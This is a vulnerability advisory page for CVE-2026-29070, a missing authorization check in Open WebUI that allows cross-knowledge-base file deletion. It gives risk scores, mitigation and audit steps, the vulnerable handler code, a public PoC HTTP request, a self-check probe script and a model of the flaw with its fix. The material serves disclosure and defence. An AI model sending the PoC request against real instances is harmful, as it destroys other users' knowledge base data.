CVE-2026-29070: open-webui: missing authz allows cross-KB file deletion

GHSA-26gm-93rw-cchf MEDIUM PoC AVAILABLE CISA: TRACK*
Published March 27, 2026
CISO Take

Any authenticated Open WebUI user can destroy files in knowledge bases they don't own. All the attacker needs is the target file's ID and write access to any knowledge base, including one they create themselves. This directly sabotages RAG pipelines: an attacker can silently gut a colleague's knowledge base, degrading AI assistant quality without triggering obvious errors. Patch to 0.8.6 immediately; if you can't, restrict knowledge base creation and write access to trusted users only.

What is the risk?

CVSS 5.4 understates operational impact in AI environments. The exploit is trivial (a valid session, write access to any knowledge base, and the target file ID; the attacker never needs access to the victim's knowledge base), the PoC is public, and Open WebUI is widely deployed in enterprise AI stacks. The EPSS score (roughly 0.3%) reflects low current exploitation, but the barrier to abuse is minimal. Highest risk in multi-tenant or shared Open WebUI deployments where users operate separate knowledge bases for different projects or sensitivity levels.

What systems are affected?

Package      Ecosystem   Vulnerable Range   Patched
Open WebUI   pip         < 0.8.6            0.8.6
Package stats: 143.3K, pushed 8d ago, 77% patched, ~5d to patch

If you run any Open WebUI release older than 0.8.6, you are affected.

How severe is it?

CVSS 3.1
5.4 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 16% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV  Attack Vector         Network
AC  Attack Complexity     Low
PR  Privileges Required   Low
UI  User Interaction      None
S   Scope                 Unchanged
C   Confidentiality       None
I   Integrity             Low
A   Availability          Low

What should I do?

5 steps
  1. Upgrade the open-webui pip package to >= 0.8.6 (the fix validates that the file belongs to the knowledge base named in the request before deleting it).

  2. If immediate patching is blocked: the attacker only needs write access to a knowledge base they control, so tightening sharing on existing knowledge bases is not enough. Remove the ability of non-admin users to create or write to any knowledge base (the workspace knowledge permission in Open WebUI's user and group permission settings) until you can upgrade.

  3. Audit for abuse. In the PoC the {id} in the path is the attacker's own knowledge base, so matching POST /api/v1/knowledge/{id}/file/remove against the caller's knowledge bases finds nothing. The tell is in the request body: a file_id that is not a member of knowledge base {id}. Standard access logs do not record POST bodies, so unless your reverse proxy logs them, audit the database instead: look for knowledge bases whose file list references file IDs that no longer exist in the files table.

  4. Back up knowledge base contents and vector collections regularly. The file record and its vector collection are deleted outright; without a backup there is nothing to restore.

  5. If unauthorized deletions are suspected, identify the account behind the requests (the bearer token maps to a user), suspend it, and rotate any API bearer tokens that may have been exposed.
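A way to verify step 1 against a running instance, added here as an example and not part of the advisory or of Open WebUI: it sends the same request as the public PoC, but with a throwaway file from one of your own knowledge bases, so no one else's data is at risk. The /file/remove path is from the advisory; the /api/v1/knowledge/create and /api/v1/knowledge/{id}/delete endpoints and their response shapes are assumptions to check against your version. `fake_transport` is a constructed offline stand-in for the HTTP layer.

```python
# Added example (not Open WebUI's code): self-check for CVE-2026-29070 using
# only your own account and a sacrificial file you are willing to lose.
# Assumed endpoints: POST /api/v1/knowledge/create, DELETE /api/v1/knowledge/{id}/delete.
import json
import urllib.error
import urllib.request


def urllib_transport(base_url: str, token: str):
    """Return send(method, path, body) -> (status, parsed JSON or None)."""
    def send(method, path, body=None):
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(
            base_url.rstrip("/") + path, data=data, method=method,
            headers={"Authorization": f"Bearer {token}",
                     "Content-Type": "application/json"})
        try:
            with urllib.request.urlopen(req, timeout=15) as resp:
                raw = resp.read()
                return resp.status, (json.loads(raw) if raw else None)
        except urllib.error.HTTPError as e:
            return e.code, None
    return send


def probe(send, sacrificial_file_id: str) -> str:
    """Return 'vulnerable', 'patched' or 'inconclusive'.

    sacrificial_file_id MUST be a file in a knowledge base you own; it is
    deleted if the instance is vulnerable. Never point this at another user's file.
    """
    status, kb = send("POST", "/api/v1/knowledge/create",
                      {"name": "cve-2026-29070-probe", "description": "scratch"})
    if status != 200 or not isinstance(kb, dict) or "id" not in kb:
        return "inconclusive"
    scratch_id = kb["id"]
    try:
        # The PoC request: path = a knowledge base we can write to,
        # body = a file that is NOT a member of it.
        status, _ = send("POST", f"/api/v1/knowledge/{scratch_id}/file/remove",
                         {"file_id": sacrificial_file_id})
        if status == 200:
            return "vulnerable"      # the file was deleted through the wrong KB
        if status in (400, 403):
            return "patched"         # membership check rejected the request
        return "inconclusive"        # e.g. 404 bad file id, 401 bad token
    finally:
        send("DELETE", f"/api/v1/knowledge/{scratch_id}/delete")


def fake_transport(patched: bool):
    """Constructed offline stand-in for urllib_transport, scripted from the PoC."""
    def send(method, path, body=None):
        if (method, path) == ("POST", "/api/v1/knowledge/create"):
            return 200, {"id": "scratch-kb"}
        if method == "POST" and path.endswith("/file/remove"):
            return (400, None) if patched else (200, {"id": "scratch-kb", "files": []})
        if method == "DELETE" and path.endswith("/delete"):
            return 200, True
        return 404, None
    return send


if __name__ == "__main__":
    import os
    import sys
    # Usage: OPENWEBUI_URL=https://host OPENWEBUI_TOKEN=... python probe.py <file_id>
    send = urllib_transport(os.environ["OPENWEBUI_URL"], os.environ["OPENWEBUI_TOKEN"])
    print(probe(send, sys.argv[1]))
```

A 200 on the cross-knowledge-base removal is the signal seen in the PoC; if you get 'vulnerable', the sacrificial file is gone, which is also your confirmation that the deletion really happened. Run it before and after upgrading.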

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - Access control for AI systems
NIST AI RMF
MANAGE-2.2 - Manage AI risks related to data quality and integrity
OWASP LLM Top 10
LLM08:2025 - Vector and Embedding Weaknesses

Frequently Asked Questions

What is CVE-2026-29070?

A missing authorization check in Open WebUI before 0.8.6: the knowledge base file-removal endpoint verifies that the caller can write to the knowledge base in the URL, but not that the file in the request body belongs to it, so any authenticated user can delete any file by ID. See the CISO Take above.

Is CVE-2026-29070 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-29070, increasing the risk of exploitation.

How to fix CVE-2026-29070?

Upgrade open-webui to 0.8.6 or later. Until then, stop non-admin users from creating or writing to knowledge bases, audit for knowledge bases whose file lists reference file IDs that no longer exist, and keep backups of knowledge base contents and vector collections. The full steps are under "What should I do?" above.

What systems are affected by CVE-2026-29070?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, knowledge management systems, multi-user AI platforms, vector databases.

What is the CVSS score for CVE-2026-29070?

CVE-2026-29070 has a CVSS v3.1 base score of 5.4 (MEDIUM). The EPSS exploitation probability is 0.25%.

What is the AI security impact?

Affected AI Architectures

RAG pipelines, knowledge management systems, multi-user AI platforms, vector databases

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application
AML.T0059 Erode Dataset Integrity
AML.T0085.000 RAG Databases
AML.T0101 Data Destruction via AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM08:2025

What are the technical details?

Original Advisory

### Summary

An access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id).

### Details

The source code at https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base:

```python
@router.post("/{id}/file/remove", response_model=Optional[KnowledgeFilesResponse])
def remove_file_from_knowledge_by_id(
    id: str,
    form_data: KnowledgeFileIdForm,
    delete_file: bool = Query(True),
    user=Depends(get_verified_user),
    db: Session = Depends(get_session),
):
    knowledge = Knowledges.get_knowledge_by_id(id=id, db=db)
    [...]
    # Note : Access control check on the knowledge base
    if (
        knowledge.user_id != user.id
        and not AccessGrants.has_access(
            user_id=user.id,
            resource_type="knowledge",
            resource_id=knowledge.id,
            permission="write",
            db=db,
        )
        and user.role != "admin"
    ):
        raise HTTPException(
            status_code=status.HTTP_400_BAD_REQUEST,
            detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
        )

    file = Files.get_file_by_id(form_data.file_id, db=db)
    [...]
    # Note : No checks on the file
    if delete_file:
        try:
            # Remove the file's collection from vector database
            file_collection = f"file-{form_data.file_id}"
            if VECTOR_DB_CLIENT.has_collection(collection_name=file_collection):
                VECTOR_DB_CLIENT.delete_collection(collection_name=file_collection)
        except Exception as e:
            log.debug("This was most likely caused by bypassing embedding processing")
            log.debug(e)
            pass

        # Delete file from database
        Files.delete_file_by_id(form_data.file_id, db=db)
    [...]
```

### PoC

Victim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1).

Attacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b).

Attacker deletes the victim file from their own collection:

```http
POST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1
Host: gaius-neo-val.fr.space.corp
Authorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0
[...]

{"file_id":"9db6dcee-bb3b-483e-aaf3-310fda366af1"}

-----

HTTP/1.1 200 OK
[...]
```

The file is then deleted from the victim's knowledge base.

### Impact

Arbitrary file deletion
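To make the handler's flaw, its fix and the forensic audit from step 3 of "What should I do?" concrete, here is an in-memory model, added as an example and not taken from Open WebUI. `Store`, `KnowledgeBase`, `can_write` and `dangling_references` are hypothetical stand-ins for the `Knowledges`, `Files`, `AccessGrants` and `VECTOR_DB_CLIENT` objects in the advisory snippet; the scenario in `demo` is constructed from the PoC (attacker's own knowledge base in the path, victim's file in the body). Whether the upstream fix exempts admins from the membership check is not known here, so this model applies it to everyone.

```python
# Added example, not Open WebUI's code: model of the /file/remove handler as
# shipped (knowledge-base write check only) and with the missing membership
# check, plus an audit that finds knowledge bases left with dangling file ids.
# Store, KnowledgeBase, can_write, dangling_references are hypothetical names.
from dataclasses import dataclass, field


class AccessProhibited(Exception):
    """Stands in for HTTPException(400, ACCESS_PROHIBITED)."""


@dataclass
class User:
    id: str
    role: str = "user"


@dataclass
class KnowledgeBase:
    id: str
    user_id: str                                    # owner
    file_ids: list[str] = field(default_factory=list)
    writers: set[str] = field(default_factory=set)  # users granted "write"


class Store:
    """Substitute for the files table, knowledge table and vector DB."""

    def __init__(self) -> None:
        self.files: dict[str, str] = {}          # file_id -> uploader
        self.kbs: dict[str, KnowledgeBase] = {}
        self.vector_collections: set[str] = set()

    def add_file(self, kb_id: str, uploader: str, file_id: str) -> None:
        self.files[file_id] = uploader
        self.kbs[kb_id].file_ids.append(file_id)
        self.vector_collections.add(f"file-{file_id}")  # per-file collection


def can_write(user: User, kb: KnowledgeBase) -> bool:
    """The only authorization the vulnerable handler performs."""
    return kb.user_id == user.id or user.id in kb.writers or user.role == "admin"


def remove_file_from_knowledge(store: Store, kb_id: str, file_id: str,
                               user: User, patched: bool) -> list[str]:
    """Mirror of the handler; patched=False reproduces CVE-2026-29070."""
    kb = store.kbs.get(kb_id)
    if kb is None:
        raise KeyError("knowledge base not found")
    if not can_write(user, kb):
        raise AccessProhibited("no write access to this knowledge base")
    if file_id not in store.files:
        raise KeyError("file not found")
    # The fix: the file must be a member of THIS knowledge base.
    if patched and file_id not in kb.file_ids:
        raise AccessProhibited("file is not part of this knowledge base")
    # Destructive part, identical in both versions: collection + file record.
    store.vector_collections.discard(f"file-{file_id}")
    del store.files[file_id]
    if file_id in kb.file_ids:
        kb.file_ids.remove(file_id)
    return list(kb.file_ids)


def dangling_references(store: Store) -> dict[str, list[str]]:
    """File ids a knowledge base still lists although the file record is gone.
    A victim's knowledge base looks like this after the attack, while the
    attacker's own knowledge base (the one in the request path) looks normal."""
    result: dict[str, list[str]] = {}
    for kb in store.kbs.values():
        missing = [f for f in kb.file_ids if f not in store.files]
        if missing:
            result[kb.id] = missing
    return result


def demo(patched: bool) -> tuple[str, bool, dict[str, list[str]]]:
    """Constructed PoC scenario. Returns (outcome, victim file still exists,
    dangling references found by the audit)."""
    store = Store()
    victim, attacker = User("victim"), User("attacker")
    store.kbs["kb-victim"] = KnowledgeBase("kb-victim", victim.id)
    store.kbs["kb-attacker"] = KnowledgeBase("kb-attacker", attacker.id)
    store.add_file("kb-victim", victim.id, "victim-doc-1")
    try:
        # Path id = attacker's OWN knowledge base; body = the victim's file id.
        remove_file_from_knowledge(store, "kb-attacker", "victim-doc-1",
                                   attacker, patched)
        outcome = "deleted"
    except AccessProhibited:
        outcome = "denied"
    return outcome, "victim-doc-1" in store.files, dangling_references(store)


if __name__ == "__main__":
    print("unpatched:", demo(patched=False))  # ('deleted', False, {'kb-victim': ['victim-doc-1']})
    print("patched:  ", demo(patched=True))   # ('denied', True, {})
```

The audit is the part worth carrying over to a real deployment: a query that joins each knowledge base's file list against the files table and reports ids with no matching record will surface victims of this bug, whereas the attacker's own knowledge base, the only one that appears in the request path, shows nothing unusual.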

Exploitation Scenario

An attacker with a standard user account on a shared Open WebUI instance (e.g., a corporate AI assistant deployment) creates their own empty knowledge base to obtain a knowledge base ID they have write access to. Through normal use or by observing network traffic, they collect file IDs from a victim's knowledge base; file IDs are UUIDs that appear in API responses. The attacker then POSTs to the file/remove endpoint of their own knowledge base with a victim file ID in the request body. The server checks write access only on the attacker's knowledge base (granted), never checks that the file belongs to it, and deletes the file record and its vector collection, so the document disappears from the victim's knowledge base without any action on the victim's side. A targeted attacker could collect file IDs for, and delete every file from, critical enterprise knowledge bases (HR policies, security runbooks, compliance docs) that feed production AI assistants, causing silent knowledge degradation.

Weaknesses (CWE)

CWE-862 — Missing Authorization: The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

  • [Architecture and Design] Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
  • [Architecture and Design] Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Timeline

Published
March 27, 2026
Last Modified
March 27, 2026
First Seen
March 27, 2026

Related Vulnerabilities